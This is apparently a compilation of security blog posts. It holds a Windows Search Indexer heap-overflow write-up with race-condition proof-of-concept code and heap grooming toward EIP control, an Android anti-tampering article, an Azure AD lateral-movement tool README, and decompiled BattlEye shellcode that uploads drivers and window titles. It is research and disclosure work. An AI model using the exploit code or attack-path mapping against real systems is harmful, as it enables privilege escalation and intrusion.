    The Crawl Scope Manager (CSM) is a set of APIs that lets you add, remove, and enumerate search roots and scope rules for the Windows Search indexer. When you want the indexer to begin crawling a new container, you can use the CSM to set the search root(s) and scope rules for paths within the search root(s).

    The CSM interface is as follows:

    For examples, adding, removing, and enumerating search roots and scope rules can be written by the following :

    The ISearchCrawlScopeManager tells the search engine about containers to crawl and/or watch, and items under those containers to include or exclude. To add a new search root, instantiate an ISearchRoot object, set the root attributes, and then call ISearchCrawlScopeManager::AddRoot and pass it a pointer to ISearchRoot object.

    // Add RootInfo & Scope Rule
    pISearchRoot->put_RootURL(L"file:///C:\ ");
    pSearchCrawlScopeManager->AddRoot(pISearchRoot);
    pSearchCrawlScopeManager->AddDefaultScopeRule(L"file:///C:\Windows", fInclude, FF_INDEXCOMPLEXURLS);
    
    // Set Registry key
    pSearchCrawlScopeManager->SaveAll(); 
    

    We can also use ISearchCrawlScopeManager to remove a root from the crawl scope when we no longer want that URL indexed. Removing a root also deletes all scope rules for that URL. We can uninstall the application, remove all data, and then remove the search root from the crawl scope, and the Crawl Scope Manager will remove the root and all scope rules associated with the root.

    // Remove RootInfo & Scope Rule
    ISearchCrawlScopeManager->RemoveRoot(pszURL);
    
    // Set Registry key
    ISearchCrawlScopeManager->SaveAll(); 
    

    The CSM enumerates search roots using IEnumSearchRoots. We can use this class to enumerate search roots for a number of purposes. For example, we might want to display the entire crawl scope in a user interface, or discover whether a particular root or the child of a root is already in the crawl scope.

    // Display RootInfo
    PWSTR pszUrl = NULL;
    pSearchRoot->get_RootURL(&pszUrl);
    wcout << L"\t" << pszUrl;
    
    // Display Scope Rule
    IEnumSearchScopeRules *pScopeRules;
    pSearchCrawlScopeManager->EnumerateScopeRules(&pScopeRules);
    
    ISearchScopeRule *pSearchScopeRule;
    pScopeRules->Next(1, &pSearchScopeRule, NULL))
    
    pSearchScopeRule->get_PatternOrURL(&pszUrl);
    wcout << L"\t" << pszUrl;
    

    We thought that a vulnerability would arise in the process of manipulating URL. Accordingly, we started analyzing the root causes.

    Root Cause Analysis

    We conducted binary analysis focusing on the following functions :

    While analyzing ISearchRoot::put_RootURL and ISearchRoot::get_RootURL, we figured out that the object’s shared variable (CSearchRoot + 0x14) was referenced.

    The put_RootURL function wrote a user-controlled data in the memory of CSearchRoot+0x14. The get_RootURL function read the data located in the memory of CSearchRoot+0x14. , it appeared that the vulnerability was caused by this shared variable concerning patches.

    image

    image

    Thus, we finally got to the point where the vulnerability initiated.

    The vulnerability was in the process of double fetching length, and the vulnerability could be triggered when the following occurs:

    1. First fetch: Used as memory allocation size (line 9)
    2. Second fetch: Used as memory copy size (line 13)

    image

    If the size of the first and that of the second differed, a heap overflow might occur, especially when the second fetch had a large size. We maintained that we change the size of pszURL sufficiently through the race condition before the memory copy occurs.

    Crash

    Through OleView5, we were able to see the interface provided by the Windows Search Manager. And we needed to hit vulnerable functions based on the methods of the interface.

    image

    We could easily test it through the COM-based command line source code provided by MSDN6. And wrote the COM client code that hit vulnerable functions as following:

    int wmain(int argc, wchar_t *argv[])
    {
        // Initialize COM library
        CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE);
    
        // Class instantiate
        ISearchRoot *pISearchRoot;
        CoCreateInstance(CLSID_CSearchRoot, NULL, CLSCTX_ALL, IID_PPV_ARGS(&pISearchRoot));
    
        // Vulnerable functions hit
        pISearchRoot->put_RootURL(L"Shared RootURL");
        PWSTR pszUrl = NULL;
        HRESULT hr = pSearchRoot->get_RootURL(&pszUrl);
        wcout << L"\t" << pszUrl;
        CoTaskMemFree(pszUrl);
    
        // Free COM resource, End
        pISearchRoot->Release();
        CoUninitialize();
    }
    

    Thereafter, bug triggering was quite simple. We created two threads: one writing different lengths of data to the shared buffer and the other reading data from the shared buffer at the same time.

    DWORD __stdcall thread_putter(LPVOID param)
    {
    	ISearchManager *pSearchManager = (ISearchManager*)param;
    	while (1) {
    		pSearchManager->put_RootURL(L"AA");
    		pSearchManager->put_RootURL(L"AAAAAAAAAA");
    	}
    	return 0;
    }
    
    DWORD __stdcall thread_getter(LPVOID param)
    {
    	ISearchRoot *pISearchRoot = (ISearchRoot*)param;
    	PWSTR get_pszUrl;
    	while (1) {
    		pISearchRoot->get_RootURL(&get_pszUrl);
    	}
    	return 0;
    }
    

    Okay, Crash!

    image

    Undoubtedly, the race condition had succeeded before the StringCchCopyW function copied the RootURL data, leading to heap overflow.

    EIP Control

    We ought to create an object to the Sever heap where the vulnerability occurs for the sake of controlling EIP.

    We wrote the client codes as following, tracking the heap status.

    int wmain(int argc, wchar_t *argv[])
    {
        CoInitializeEx(NULL, COINIT_MULTITHREADED | COINIT_DISABLE_OLE1DDE);
        ISearchRoot *pISearchRoot[20];
        for (int i = 0; i < 20; i++) {
            CoCreateInstance(CLSID_CSearchRoot, NULL, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&pISearchRoot[i]));
        }
        pISearchRoot[3]->Release();
        pISearchRoot[5]->Release();
        pISearchRoot[7]->Release();
        pISearchRoot[9]->Release();
        pISearchRoot[11]->Release();
    
        
        CreateThread(NULL, 0, thread_putter, (LPVOID)pISearchRoot[13], 0, NULL);
        CreateThread(NULL, 0, thread_getter, (LPVOID)pISearchRoot[13], 0, NULL);
        Sleep(500);
        
        CoUninitialize();
        return 0;
    }
    

    We found out that if the client did not release the pISearchRoot object, IRpcStubBuffer objects would remain on the server heap. And we also saw that the IRpcStubBuffer object remained near the location of the heap where the vulnerability occurred.

        0:010> !heap -p -all
        ...
        03d58f10 0005 0005  [00]   03d58f18    0001a - (busy)     <-- CoTaskMalloc return
        	mssprxy!_idxpi_IID_Lookup <PERF> (mssprxy+0x75)
        03d58f38 0005 0005  [00]   03d58f40    00020 - (free)
        03d58f60 0005 0005  [00]   03d58f68    0001c - (busy)     <-- IRpcStubBuffer Obj
          ? mssprxy!_ISearchRootStubVtbl+10
        03d58f88 0005 0005  [00]   03d58f90    0001c - (busy)
          ? mssprxy!_ISearchRootStubVtbl+10                       <-- IRpcStubBuffer Obj
        03d58fb0 0005 0005  [00]   03d58fb8    00020 - (busy)
        03d58fd8 0005 0005  [00]   03d58fe0    0001c - (busy)
          ? mssprxy!_ISearchRootStubVtbl+10                       <-- IRpcStubBuffer Obj
        03d59000 0005 0005  [00]   03d59008    0001c - (busy)
          ? mssprxy!_ISearchRootStubVtbl+10                       <-- IRpcStubBuffer Obj
        03d59028 0005 0005  [00]   03d59030    00020 - (busy)
        03d59050 0005 0005  [00]   03d59058    00020 - (busy)
        03d59078 0005 0005  [00]   03d59080    00020 - (free)
        03d590a0 0005 0005  [00]   03d590a8    00020 - (free)
        03d590c8 0005 0005  [00]   03d590d0    0001c - (busy)
          ? mssprxy!_ISearchRootStubVtbl+10                       <-- IRpcStubBuffer Obj
    

    In COM, all interfaces have their own interface stub space. Stubs are small memory spaces used to support remote method calls during RPC communication, and IRpcStubBuffer is the primary interface for such interface stubs. In this process, the IRpcStubBuffer to support pISearchRoot’s interface stub remains on the server’s heap.

    The vtfunction of IRpcStubBuffer is as follows :

        0:003> dds poi(03d58f18) l10
        71215bc8  7121707e mssprxy!CStdStubBuffer_QueryInterface
        71215bcc  71217073 mssprxy!CStdStubBuffer_AddRef
        71215bd0  71216840 mssprxy!CStdStubBuffer_Release
        71215bd4  71217926 mssprxy!CStdStubBuffer_Connect
        71215bd8  71216866 mssprxy!CStdStubBuffer_Disconnect <-- client call : CoUninitialize();
        71215bdc  7121687c mssprxy!CStdStubBuffer_Invoke
        71215be0  7121791b mssprxy!CStdStubBuffer_IsIIDSupported
        71215be4  71217910 mssprxy!CStdStubBuffer_CountRefs
        71215be8  71217905 mssprxy!CStdStubBuffer_DebugServerQueryInterface
        71215bec  712178fa mssprxy!CStdStubBuffer_DebugServerRelease
    

    When the client’s COM is Uninitialized, IRpcStubBuffer::Disconnect disconnects all connections of object pointer. Therefore, if the client calls CoUninitialize function, CStdStubBuffer_Disconnect function is called on the server. It means that users can construct fake vtable and call that function.

    However, we haven’t always seen IRpcStubBuffer allocated on the same location heap. Therefore, several tries were needed to construct the heap layout. After several tries, the IRpcStubBuffer object was covered with the controllable value (0x45454545) as follows.

    In the end, we could show that indirect calls to any function in memory are possible!

    image

    Conclusion

    Most of the LPE vulnerabilities recently occurred in Windows Service, were logic bugs. In this manner, analysis on Memory corruption vulnerabilities of Windows Search Indexer was quite interesting. Thereby, such Memory Corruption vulnerabilities are likely to occur in Windows Service hereafter. We should not overlook the possibilities.

    We hope that the analysis will serve as an insight to other vulnerability researchers and be applied to further studies.

    Reference

  13. Protecting your Android App against Reverse Engineering and Tampering

    Apr 2 · 4 min read
     

    I built a premium (paid) android app that has been cracked and modded. Therefore, I started researching ways to secure my code and make it more difficult to modify my app.

    Before I continue, You cannot mitigate these issues or completely prevent people from breaking your app. All you can do is make it slightly more difficult to get in and understand your code.

    I wrote this article because I felt that the only sources of information just said that it was nearly impossible to protect your app, just don’t leave secrets on the client device. That is partly true, but I wanted to compile sources that can actually assist independent developers like me. Lastly, when you search “android reverse engineer”, all the results are for cracking other peoples apps. There are almost no sources on how to protect your own apps.

    So here are some useful blogs and libraries which has helped me make my code more tamper-resistant. Several sources that are less popular have been mentioned in the list below to help you!

    This article is geared towards new android developers or ones who haven’t really dealt with reverse engineering and mods before.

    Proguard:

    This is built into android studio and serves several purposes. The first one is code obfuscation, basically turning your code into gibberish to make it difficult to understand. This can easily be beaten, but it is super simple to add to your app so I still recommend implementing it.

    The second function is code shrinking, which is still relevant to this article. Basically, it removes unused resources and code. I wouldn’t rely on this, but it is included by default and worth implementing. The only way of actually checking if it changed anything is by reverse engineering your own APK.

    Dexguard:

    A tool that isn’t free, but made by the same team of Proguard. I haven’t used it myself, so can’t recommend it.

    It includes everything that Proguard has and adds more features. Some notable additions are String and Resource Encryption.

    Android NDK:

    Writing parts of your app in native code (C or C++) will certainly deter people from reverse engineering your app. There are several downsides to using the NDK, such as performance issues when making JNI calls and you can introduce potential bugs down the line that will be harder to track. You’ll also have to do the garbage collection yourself, which isn’t trivial for beginners.

    PiracyChecker:

    A popular library on github with some basic ways to mitigate reverse engineering. I included this in one of my apps, but it already has been cracked. There are multiple checks you can run, including an implementation of the Google Play Licensing Check (LVL). This is open source, so you can look at his code and contribute too!

    I am using Google Play app signing, so couldn’t actually use the APK signature to verify that I signed the app, or even google did ;(

    Google’s SafetyNet Attestation API:

    This is an amazing option, though I haven’t tested it thoroughly. Basically, you call Google’s Attestation API and they can tell you if the device the app is running on is secure or not. Basically if it is rooted, or using LuckyPatcher for instance.

    Deguard:

    This was a website that I stumbled upon. You upload an APK file, then it uses some algorithms to reverse what proguard does. Now, you can open classes, sometimes with full class names too! I used this to pull some modded versions of my app and see what has been changed more or less. There are manual processes to achieve similar results, but this is faster and requires less work.

    http://apk-deguard.com/

    Android Anti-Reversing Defenses:

    This blog post explains some great defenses to put up against hackers/reverse engineering. I suggest reading it and implementing at least one or two of the methods used. There are code snippets too!

    Android Security: Adding Tampering Detection to Your App:

    Another great article, also with code snippets about how to protect your app. this piece also includes great explanations about how each method woks.

    https://www.airpair.com/android/posts/adding-tampering-detection-to-your-android-app

    MobSF:

    I heard about this from an Android Reverse Engineering Talk I wa swatching on YouTube. They mentioned this amazing tool in passing. I have never heard of it before but decided to go ahead and test it out. It works on Windows, Linux, and Mac. In short, you run this locally -> upload an APK (no AABs yet), and it analyses it for vulnerbilities. It performs basical checks and shows you a lot of information about an APK, like who signed the cert , app permissions, all the strings, and much more!

    I had some issues installing it, but the docs are good and they have a slack channel which came in handy.

    https://github.com/MobSF/Mobile-Security-Framework-MobSF


    Overall, there are several ways to make your app more difficult to crack. I’d recommend that your app should call an API rather than do the checks locally. It is much easier to modify code on the client rather than on the server.

    Let me know if I missed anything, and if you have more ideas!


  14. What is AzureADLateralMovement

    AzureADLateralMovement allows to build Lateral Movement graph for Azure Active Directory entities - Users, Computers, Groups and Roles. Using the Microsoft Graph API AzureADLateralMovement extracts interesting information and builds json files containing lateral movement graph data competable with Bloodhound 2.2.0

    Some of the implemented features are :

    • Extraction of Users, Computers, Groups, Roles and more.
    • Transform the entities to Graph objects
    • Inject the object to Azure CosmosDB Graph

    LMP.png Explanation: Terry Jeffords is a member of Device Administrators. This group is admin on all the AAD joined machines including Desktop-RGR29LI Where the user Amy Santiago has logged-in in the last 2 hours and probably still has a session. This attack path can be exploited manually or by automated tools.

    Architecture

    The toolkit consists of several components

    MicrosoftGraphApi Helper

    The MicrosoftGraphApi Helper is responsible for retriving the required data from Graph API

    BloodHound Helper

    Responsible for creating json files that can dropped on BloodHound 2.2.0 to extend the organization covered entities

    CosmosDbGraph Helper

    In case you prefer using the Azure CosmosDb service instead of the BloodHound client, this module will push the data retrived into a graph database service

    How to set up

    Steps

    1. Download, compile and run
    2. Browse to http://localhost:44302
    3. Logon with AAD administrative account
    4. Click on "AzureActiveDirectoryLateralMovement" to retrive data
    5. Drag the json file into BloodHound 2.2.0

    DragAndDrop.png

    Configuration

    An example configuration as below :

    {
      "AzureAd": {
        "CallbackPath": "/signin-oidc",
        "BaseUrl": "https://localhost:44334",
        "Scopes": "Directory.Read.All AuditLog.Read.All",
        "ClientId": "<ClientId>",
        "ClientSecret": "<ClientSecret>",
        "GraphResourceId": "https://graph.microsoft.com/",
        "GraphScopes": "Directory.Read.All AuditLog.Read.All"
      },
      "Logging": {
        "IncludeScopes": false,
        "LogLevel": {
          "Default": "Warning"
        }
      },
      "CosmosDb": {
        "EndpointUrl": "https://<CosmosDbGraphName>.documents.azure.com:443/",
        "AuthorizationKey": "<AuthorizationKey>"
      } 
    }
    

    Deployment

    Before start using this tool you need to create an Application on the Azure Portal. Go to Azure Active Directory -> App Registrations -> Register an application.

    registerapp.png

    After creating the application, copy the Application ID and change it on AzureOauth.config.

    The URL(external listener) that will be used for the application should be added as a Redirect URL. To add a redirect url, go the application and click Add a Redirect URL.

    redirecturl.png

    The Redirect URL should be the URL that will be used to host the application endpoint, in this case https://localhost:44302/

    url.png

    Make sure to check both the boxes as shown below :

    implicitgrant.png

    Security Considerations

    The lateral movement graph allows investigate available attack paths truly available in the AAD environment. The graph is combined by Nodes of Users, Groups and Devices, where the edges are connecting them by the logic of �AdminTo�, �MemberOf� and �HasSession� This logic is explained in details by the original research document: https://github.com/BloodHoundAD/Bloodhound/wiki

    In the on-premise environment BloodHound collects data using SMAR and SMB protocols to each machine in the domain, and LDAP to the on-premise AD.

    In Azure AD environment, the relevant data regarding Azure AD device, users and logon sessions can be retrieved using Microsoft Graph API. Once the relevant data is gathered it is possible to build similar graph of connections for users, groups and Windows machines registered in the Azure Active Directory.

    To retrive the data and build the graph data this project uses: Azure app Microsoft Graph API Hybrid AD+AAD domain environment synced using pass-through authentication BloodHound UI and entities objects

    implicitgrant.png

    The AAD graph is based on the following data

    Devices - AAD joined Windows devices only and their owner's

    Users - All AD or AAD users

    Administrative roles and Groups - All memberships of roles and groups

    Local Admin - The following are default local admins in AAD joined device - Global administrator role - Device administrator role - The owner of the machine

    Sessions - All logins for Windows machines

    References

    Exploring graph queries on top of Azure Cosmos DB with Gremlin https://github.com/talmaor/GraphExplorer SharpHound - The C# Ingestor https://github.com/BloodHoundAD/BloodHound/wiki/Data-Collector Quickstart: Build a .NET Framework or Core application using the Azure Cosmos DB Gremlin API account https://docs.microsoft.com/en-us/azure/cosmos-db/create-graph-dotnet How to: Use the portal to create an Azure AD application and service principal that can access resources https://docs.microsoft.com/en-us/azure/active-directory/develop/howto-create-service-principal-portal

     

    Sursa: https://github.com/talmaor/AzureADLateralMovement

  15. Mar 31, 2020 :: vmcall :: [ battleye, anti-cheats, game-hacking ]

    BattlEye reverse engineer tracking

    Preface

    Modern commercial anti-cheats are faced by an increasing competetiveness in professional game-hack production, and thus have begun implementing questionable methods to prevent this. In this article, we will present a previously unknown anti-cheat module, pushed to a small fraction of the player base by the commercial anti-cheat BattlEye. The prevalent theory is that this module is specifically targeted against reverse engineers, to monitor the production of video game hacking tools, due to the fact that this is dynamically pushed.

    Shellcode ??

    [1] Shellcode refers to independent code that is dynamically loaded into a running process.

    The code snippets in this article are beautified decompilations of shellcode [1] that we’ve dumped and deobfuscated from BattlEye. The shellcode was pushed to my development machine while messing around in Escape from Tarkov. On this machine various reverse engineering applications such as x64dbg are installed and frequently running, which might’ve caught the attention of the anti-cheat in question. To confirm the suspicion, a secondary machine that is mainly used for testing was booted, and on it, Escape from Tarkov was installed. The shellcode in question was not pushed to the secondary machine, which runs on the same network and utilized the same game account as the development machine.

    Other members of Secret Club have experienced the same ordeal, and the common denominator here is that we’re all highly specialized reverse engineers, which means most have the same applications installed. To put a nail in the coffin I asked a few of my fellow highschool classmates to let me log shellcode activity (using a hypervisor) on their machines while playing Escape from Tarkov, and not a single one of them received the module in question. Needless to say, some kind of technical minority is being targeted, which the following code segments will show.

    Context

    In this article, you will see references to a function called battleye::send. This function is used by the commercial anti-cheat to send information from the client module BEClient_x64/x86.dll inside of the game process, to the respective game server. This is to be interpreted as a pure “send data over the internet” function, and only takes a buffer as input. The ID in each report header determines the type of “packet”, which can be used to distinguish packets from one another.

    Device driver enumeration

    This routine has two main purposes: enumerating device drivers and installed certificates used by the respective device drivers. The former has a somewhat surprising twist though, this shellcode will upload any device driver(!!) matching the arbitrary “evil” filter to the game server. This means that if your proprietary, top-secret and completely unrelated device driver has the word “Callback” in it, the shellcode will upload the entire contents of the file on disk. This is a privacy concern as it is a relatively commonly used word for device drivers that install kernel callbacks for monitoring events.

    The certificate enumerator sends the contents of all certificates used by device drivers on your machine directly to the game server:

      // ONLY ENUMERATE ON X64 MACHINES
      GetNativeSystemInfo(&native_system_info);
      if ( native_system_info.u.s.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_AMD64 )
      {
        if ( EnumDeviceDrivers(device_list, 0x2000, &required_size) )
        {
          if ( required_size <= 0x2000u )
          {
            report_buffer = (__int8 *)malloc(0x7530);
            report_buffer[0] = 0;
            report_buffer[1] = 0xD;
            buffer_index = 2;
    
            // DISABLE FILESYSTEM REDIRECTION IF RUN IN WOW64
            if ( Wow64EnableWow64FsRedirection )
              Wow64EnableWow64FsRedirection(0);
    
            // ITERATE DEVICE DRIVERS
            for ( device_index = 0; ; ++device_index )
            {
              if ( device_index >= required_size / 8u /* MAX COUNT*/ )
                break;
    
              // QUERY DEVICE DRIVER FILE NAME
              driver_file_name_length = GetDeviceDriverFileNameA(
                                          device_list[device_index],
                                          &report_buffer[buffer_index + 1],
                                          0x100);
              report_buffer[buffer_index] = driver_file_name_length;
    
              // IF QUERY DIDN'T FAIL
              if ( driver_file_name_length )
              {
                // CACHE NAME BUFFER INDEX FOR LATER USAGE
                name_buffer_index = buffer_index;
    
                // OPEN DEVICE DRIVER FILE HANDLE
                device_driver_file_handle = CreateFileA(
                                              &report_buffer[buffer_index + 1],
                                              GENERIC_READ,
                                              FILE_SHARE_READ,
                                              0,
                                              3,
                                              0,
                                              0);
    
                if ( device_driver_file_handle != INVALID_HANDLE_VALUE )
                {
                  // CONVERT DRIVER NAME
                  MultiByteToWideChar(
                    0,
                    0,
                    &report_buffer[buffer_index + 1],
                    0xFFFFFFFF,
                    &widechar_buffer,
                    0x100);
                }
                after_device_driver_file_name_index = buffer_index + report_buffer[buffer_index] + 1;
    
                // QUERY DEVICE DRIVER FILE SIZE
                *(_DWORD *)&report_buffer[after_device_driver_file_name_index] = GetFileSize(device_driver_file_handle, 0);
                after_device_driver_file_name_index += 4;
                report_buffer[after_device_driver_file_name_index] = 0;
                buffer_index = after_device_driver_file_name_index + 1;
    
                CloseHandle(device_driver_file_handle);
    
                // IF FILE EXISTS ON DISK
                if ( device_driver_file_handle != INVALID_HANDLE_VALUE )
                {
                  // QUERY DEVICE DRIVER CERTIFICATE
                  if ( CryptQueryObject(
                         1,
                         &widechar_buffer,
                         CERT_QUERY_CONTENT_FLAG_PKCS7_SIGNED_EMBED,
                         CERT_QUERY_FORMAT_FLAG_BINARY,
                         0,
                         &msg_and_encoding_type,
                         &content_type,
                         &format_type,
                         &cert_store,
                         &msg_handle,
                         1) )
                  {
                    // QUERY SIGNER INFORMATION SIZE
                    if ( CryptMsgGetParam(msg_handle, CMSG_SIGNER_INFO_PARAM, 0, 0, &signer_info_size) )
                    {
                      signer_info = (CMSG_SIGNER_INFO *)malloc(signer_info_size);
                      if ( signer_info )
                      {
                        // QUERY SIGNER INFORMATION
                        if ( CryptMsgGetParam(msg_handle, CMSG_SIGNER_INFO_PARAM, 0, signer_info, &signer_info_size) )
                        {
                          qmemcpy(&issuer, &signer_info->Issuer, sizeof(issuer));
                          qmemcpy(&serial_number, &signer_info->SerialNumber, sizeof(serial_number));
                          cert_ctx = CertFindCertificateInStore(
                                                       cert_store,
                                                       X509_ASN_ENCODING|PKCS_7_ASN_ENCODING,
                                                       0,
                                                       CERT_FIND_SUBJECT_CERT,
                                                       &certificate_information,
                                                       0); 
                          if ( cert_ctx )
                          {
                            // QUERY CERTIFICATE NAME
                            cert_name_length = CertGetNameStringA(
                                                 cert_ctx,
                                                 CERT_NAME_SIMPLE_DISPLAY_TYPE,
                                                 0,
                                                 0,
                                                 &report_buffer[buffer_index],
                                                 0x100);
                            report_buffer[buffer_index - 1] = cert_name_length;
                            if ( cert_name_length )
                            {
                              report_buffer[buffer_index - 1] -= 1;
                              buffer_index += character_length;
                            }
                            // FREE CERTIFICATE CONTEXT
                            CertFreeCertificateContext(cert_ctx);
                          }
                        }
                        free(signer_info);
                      }
                    }
                    // FREE CERTIFICATE STORE HANDLE
                    CertCloseStore(cert_store, 0);
                    CryptMsgClose(msg_handle);
                  }
    
                  // DUMP ANY DRIVER NAMED "Callback????????????" where ? is wildmark
                  if ( *(_DWORD *)&report_buffer[name_buffer_index - 0x11 + report_buffer[name_buffer_index]] == 'llaC'
                    && *(_DWORD *)&report_buffer[name_buffer_index - 0xD + report_buffer[name_buffer_index]] == 'kcab'
                    && (unsigned __int64)suspicious_driver_count < 2 )
                  {
                    // OPEN HANDLE ON DISK
                    file_handle = CreateFileA(
                        &report_buffer[name_buffer_index + 1],
                        0x80000000,
                        1,
                        0,
                        3,
                        128,
                        0);
    
                    if ( file_handle != INVALID_HANDLE_VALUE )
                    {
                      // INITIATE RAW DATA DUMP
                      raw_packet_header.pad = 0;
                      raw_packet_header.id = 0xBEu;
                      battleye::send(&raw_packet_header, 2, 0);
    
                      // READ DEVICE DRIVER CONTENTS IN CHUNKS OF 0x27EA (WHY?)
                      while ( ReadFile(file_handle, &raw_packet_header.buffer, 0x27EA, &size, 0x00) && size )
                      {
                        raw_packet_header.pad = 0;
                        raw_packet_header.id = 0xBEu;
                        battleye::send(&raw_packet_header, (unsigned int)(size + 2), 0);
                      }
    
                      CloseHandle(file_handle);
                    }
                  }  
                }
              }
            }
    
            // ENABLE FILESYSTEM REDIRECTION
            if ( Wow64EnableWow64FsRedirection )
            {
              Wow64EnableWow64FsRedirection(1, required_size % 8u);
            }
    
            // SEND DUMP
            battleye::send(report_buffer, buffer_index, 0);
            free(report_buffer);
          }
        }
      }
    

    Window enumeration

    This routine enumerates all visible windows on your computer. Each visible window will have its title dumped and uploaded to the server together with the window class and style. If this shellcode is pushed while you have a Google Chrome tab open in the background with confidential information regarding your divorce, BattlEye now knows about this, too bad. While this is probably a really great method to monitor the activites of cheaters, it’s a very aggressive way and probably yields a ton of inappropriate information, which will be sent to the game server over the internet. No window is safe from being dumped, so be careful when you load up your favorite shooter game.

    The decompilation is as follows:

      top_window_handle = GetTopWindow(0x00);
      if ( top_window_handle )
      {
        report_buffer = (std::uint8_t*)malloc(0x5000);
        report_buffer[0] = 0;
        report_buffer[1] = 0xC;
        buffer_index = 2;
        do
        {
          // FILTER VISIBLE WINDOWS
          if ( GetWindowLongA(top_window_handle, GWL_STYLE) & WS_VISIBLE )
          {
            // QUERY WINDOW TEXT
            window_text_length = GetWindowTextA(top_window_handle, &report_buffer[buffer_index + 1], 0x40);
    
            for ( I = 0; I < window_text_length; ++i )
              report_buffer[buffer_index + 1 + i] = 0x78; 
    
            report_buffer[buffer_index] = window_text_length;
    
            // QUERY WINDOW CLASS NAME
            after_name_index = buffer_index + (char)window_text_length + 1;
            class_name_length = GetClassNameA(top_window_handle, &report_buffer[after_name_index + 1], 0x40);
            report_buffer[after_name_index] = class_name_length;
            after_class_index = after_name_index + (char)class_name_length + 1;
    
            // QUERY WINDOW STYLE
            window_style = GetWindowLongA(top_window_handle, GWL_STYLE);
            extended_window_style = GetWindowLongA(top_window_handle, GWL_EXSTYLE);
            *(_DWORD *)&report_buffer[after_class_index] = extended_window_style | window_style;
    
            // QUERY WINDOW OWNER PROCESS ID
            GetWindowThreadProcessId(top_window_handle, &window_pid);
            *(_DWORD *)&report_buffer[after_class_index + 4] = window_pid;
    
    
            buffer_index = after_class_index + 8;
          }
          top_window_handle = GetWindow(top_window_handle, GW_HWNDNEXT);
        }
        while ( top_window_handle && buffer_index <= 0x4F40 );
        battleye::send(report_buffer, buffer_index, false);
        free(report_buffer);
      }
    

    Shellcode detection

    [2] Manually mapping an executable is a process of replicating the windows image loader

    Another mechanism of this proprietary shellcode is the complete address space enumeration done on all processes running. This enumeration routine checks for memory anomalies frequently seen in shellcode and manually mapped portable executables [2].

    This is done by enumerating all processes and their respective threads. By checking the start address of each thread and cross-referencing this to known module address ranges, it is possible to deduce which threads were used to execute dynamically allocated shellcode. When such an anomaly is found, the thread start address, thread handle, thread index and thread creation time are all sent to the respective game server for further investigation.

    This is likely done because allocating code into a trusted process yields increased stealth. This method kind of mitigates it as shellcode stands out if you start threads directly for them. This would not catch anyone using a method such as thread hijacking for shellcode execution, which is an alternative method.

    The decompilation is as follows:

    query_buffer_size = 0x150;
    while ( 1 )
    {
      // QUERY PROCESS LIST
      query_buffer_size += 0x400;
      query_buffer = (SYSTEM_PROCESS_INFORMATION *)realloc(query_buffer, query_buffer_size);
      if ( !query_buffer )
        break;
      query_status = NtQuerySystemInformation(
                        SystemProcessInformation, query_buffer, 
                        query_buffer_size, &query_buffer_size); 
      if ( query_status != STATUS_INFO_LENGTH_MISMATCH )
      {
        if ( query_status >= 0 )
        {
          // QUERY MODULE LIST SIZE
          module_list_size = 0;
          NtQuerySystemInformation)(SystemModuleInformation, &module_list_size, 0, &module_list_size);
          modules_buffer = (RTL_PROCESS_MODULES *)realloc(0, module_list_size);
          if ( modules_buffer )
          {
            // QUERY MODULE LIST
            if ( NtQuerySystemInformation)(
                   SystemModuleInformation,
                   modules_buffer,
                   module_list_size,
                   1) >= 0 )
            {
              for ( current_process_entry = query_buffer;
                    current_process_entry->UniqueProcessId != GAME_PROCESS_ID;
                    current_process_entry = 
                        (std::uint64_t)current_process_entry + 
                        current_process_entry->NextEntryOffset) )
              {
                if ( !current_process_entry->NextEntryOffset )
                  goto STOP_PROCESS_ITERATION_LABEL;
              }
              for ( thread_index = 0; thread_index < current_process_entry->NumberOfThreads; ++thread_index )
              {
                // CHECK IF THREAD IS INSIDE OF ANY KNOWN MODULE
                for ( module_count = 0;
                      module_count < modules_buffer->NumberOfModules
                   && current_process_entry->threads[thread_index].StartAddress < 
                        modules_buffer->Modules[module_count].ImageBase
                    || current_process_entry->threads[thread_index].StartAddress >= 
                        (char *)modules_buffer->Modules[module_count].ImageBase + 
                            modules_buffer->Modules[module_count].ImageSize);
                      ++module_count )
                {
                  ;
                }
                if ( module_count == modules_buffer->NumberOfModules )// IF NOT INSIDE OF ANY MODULES, DUMP
                {
                  // SEND A REPORT !
                  thread_report.pad = 0;
                  thread_report.id = 0xF;
                  thread_report.thread_base_address = 
                    current_process_entry->threads[thread_index].StartAddress;
                  thread_report.thread_handle = 
                    current_process_entry->threads[thread_index].ClientId.UniqueThread;
                  thread_report.thread_index = 
                    current_process_entry->NumberOfThreads - (thread_index + 1);
                  thread_report.create_time = 
                    current_process_entry->threads[thread_index].CreateTime - 
                        current_process_entry->CreateTime;
                  thread_report.windows_directory_delta = nullptr;
                  
                  if ( GetWindowsDirectoryA(&directory_path, 0x80) )
                  {
                    windows_directory_handle = CreateFileA(
                                                 &directory_path,
                                                 GENERIC_READ,
                                                 7,
                                                 0,
                                                 3,
                                                 0x2000000,
                                                 0);
                    if ( windows_directory_handle != INVALID_HANDLE_VALUE )
                    {
                      if ( GetFileTime(windows_directory_handle, 0, 0, &last_write_time) )
                        thread_report.windows_directory_delta = 
                            last_write_time - 
                                current_process_entry->threads[thread_index].CreateTime;
                      CloseHandle(windows_directory_handle);
                    }
                  }
                  thread_report.driver_folder_delta = nullptr;
                  system_directory_length = GetSystemDirectoryA(&directory_path, 128);
                  if ( system_directory_length )
                  {
                    // Append \\Drivers
                    std::memcpy(&directory_path + system_directory_length, "\\Drivers", 9);
                    driver_folder_handle = CreateFileA(&directory_path, GENERIC_READ, 7, 0i, 3, 0x2000000, 0);
                    if ( driver_folder_handle != INVALID_HANDLE_VALUE )
                    {
                      if ( GetFileTime(driver_folder_handle, 0, 0, &drivers_folder_last_write_time) )
                        thread_report.driver_folder_delta = 
                            drivers_folder_last_write_time - 
                                current_process_entry->threads[thread_index].CreateTime;
                      CloseHandle(driver_folder_handle);
                    }
                  }
                  battleye::send(&thread_report.pad, 0x2A, 0);
                }
              }
            }
    STOP_PROCESS_ITERATION_LABEL:
            free(modules_buffer);
          }
          free(query_buffer);
        }
        break;
      }
    }
    

    Shellcode dumping

    The shellcode will also scan the game process and the Windows process lsass.exe for suspicious memory allocations. While the previous memory scan mentioned in the above section looks for general abnormalities in all processes specific to thread creation, this focuses on specific scenarios and even includes a memory region size whitelist, which should be quite trivial to abuse.

